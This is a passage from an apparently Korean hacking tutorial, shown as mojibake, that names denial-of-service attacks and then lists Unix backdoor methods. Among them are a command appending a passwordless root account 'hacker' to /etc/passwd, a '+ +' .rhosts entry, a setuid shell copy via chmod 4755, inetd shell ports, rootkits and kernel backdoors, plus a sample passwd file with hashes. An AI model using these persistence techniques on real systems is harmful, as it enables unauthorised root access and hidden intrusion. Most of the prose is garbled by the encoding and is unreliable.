¼ºñ½º°¡ Àß ¾ÊµÇ´Â B¾÷üº¸´Ù´Â A¾÷ü·Î »ç¿ëÀÚµéÀÌ ¸ô¸®°Ô µÉ
°ÍÀÌ´Ù. DOSÀÇ °æ¿ì °ø°ÝÀÚ¸¦ Àß ÆľÇÇÒ ¼öµµ ¾ø´Ù. (spoofingÀ»
»ç¿ëÇϹǷΠ´©°¡ ½Ã½ºÅÛÀ» DOS ·Î °ø°ÝÇÏ´ÂÁö ¹ß°ßÇس»±â ¾î·Æ´Ù.)
¹¹.. ÀÌ·±½ÄÀÌÁö... DOS°ø°Ý¿¡´Â smurf. teardrop, ping flooding,
syn flooding, Æøź¸ÞÀÏ µîµî.. ¼ö¾øÀÌ ¸¹´Ù. ¼ºñ½º¸¸ Á¦ ±¸½Ç¸øÇÏ°Ô²û
ÇÒ ¼öµµ ÀÖÁö¸¸ ½Ã½ºÅÛ Àüü¸¦ ¸À°¡°Ô ÇÒ ¼öµµ ÀÖ´Ù.
6.5 BackDoor
- Æнº¿öµå ¹éµµ¾î
> Æнº¿öµå »ìÆ캸±â : root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash
salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash
Æнº¿öµå´Â 7°³ÀÇ Çʵå·Î ³ª´¶´Ù.
À¯Àú¸í : Æнº¿öµå : À¯ÀúID : ±×·ìID : À̸§
: Ȩ µð·ºÅ丮 : shell root : fVi3dx5Ytkdo : 0 : 0 : root
: / : /bin/bash
¿ÀÈ£¶ó~ »ý°¢º¸´Ù ½±³×.. ¿©·¯ºÐµé.. ÀÌÇØ°¡
°¡Áö? ±×·³ Æнº¿öµå ÆÄÀÏ¿¡ ¹éµµ¾î¸¦ ½É¾îº¼±î? /etc/passwd¿¡
´ÙÀ½°ú °°ÀÌ Áý¾î ³Ö¾îº¸ÀÚ.
$ echo ¡°hacker::0:0:hacker:/:/bin/bash¡±
>> /etc/passwd
À¯ÀúID:±×·ìID°¡ 0:0À¸·Î ¼³Á¤µÇ¾î ÀÖ´Ù¸é ±×°ÍÀº
rootÀÇ ±ÇÇÑÀ» °¡Áö°í ÀÖ´Ù´Â ¶æÀÌ´Ù. ±×·³ hacker¶ó´Â À¯Àú´Â
·çÆ®ÀÇ ±ÇÇÑÀ» °¡Áö°í Æнº¿öµå ¾øÀÌ ·Î±×ÀÎ ÇÒ ¼ö ÀÖ´Â°Ô µÇ³×...
ÀÌ·± ¹æ¹ýÀ¸·Îµµ ¹éµµ¾î¸¦ ¸¸µé ¼ö ÀÖÁö¸¸ ½±°Ô µéų ¼ö ÀÖ´Ù.
±×·¡¼ Æнº¿öµå Áß°£Á¤µµ¿¡ Áý¾î³ÖµçÁö ¾Æ´Ï¸é Àß »ç¿ëÇÏÁö ¾Ê´Â
»ç¿ëÀÚÀÇ À¯ÀúID¿Í ±×·ìID¸¦ 0:0À¸·Î ¹Ù²Ù¾î »ç¿ëÇÒ ¼öµµ ÀÖ´Ù.
- .rhosts ¹éµµ¾î
À¯´Ð½ºÀÇ rsh, rlogin ¸í·É¾î´Â Ȩµð·ºÅ丮ÀÇ .rhosts ÆÄÀÏÀ» ÂüÁ¶ÇÏ¿©
»ç¿ëÇÏ´Â ¸í·É¾îÀÌ´Ù. .rhosts¿¡ + + ¸¦ ³ÖÀ¸¸é ´©±¸µç Æнº¿öµå
¾øÀÌ ½Ã½ºÅÛ¿¡ Á¢¼ÓÇÒ ¼ö ÀÖ´Ù.
- setuid ¹éµµ¾î
2Àå¿¡¼µµ ¼³¸íÇßµíÀÌ shellÀ» copyÇÏ¿© setuid¸¦ ºÙ¿©¼ ¹éµµ¾î·Î
»ç¿ëÇÑ´Ù.
-r-sr-xr-x 3 root root 88620 1997³â 7¿ù
16ÀÏ /bin/hacker ¸ðµå º¯°æÀº
root ±ÇÇÑÀ¸·Î chmod 4755 <filename>
- TCP ½© ¹éµµ¾î
inetd.conf ¿Í services ÆÄÀÏ¿¡ ½© Æ÷Æ®(TCP)¸¦ ¿¾î¼ Á¢¼ÓÇÏ´Â
¹éµµ¾î.
- UDP ½© ¹éµµ¾î
¹æȺ®Àº DNS¼ºñ½º ¶§¹®¿¡ UDP ÆÐŶÀº ¸·Áö ¾Ê´Â´Ù. ±× Á¡À» ÀÌ¿ëÇؼ
UDP ½© ¹éµµ¾î¸¦ ¸¸µé¸é ¹«»çÅë°úÇÒ¼ö ÀÖ´Ù.
- Rootkit
¹éµµ¾î ÇÁ·Î±×·¥µéÀ» ÀÚµ¿À¸·Î ¼³Ä¡ÇÏ¿©ÁÖ´Â ÇÁ·Î±×·¥.
- Ä¿³Î ¹éµµ¾î
Ä¿³Î ÀÚü¸¦ ¼öÁ¤ÇÏ¿© ¹éµµ¾î¸¦ ¸¸µç´Ù. °í±Þ ¹éµµ¾î ¹æ¹ýÀ¸·Î ¹ß°ßÀÌ
°ÅÀÇ ºÒ°¡´ÉÇÏ´Ù.
Âü°í ÀÚ·á internet hacking document
security advisory 8lgm advisory
¡ã top
|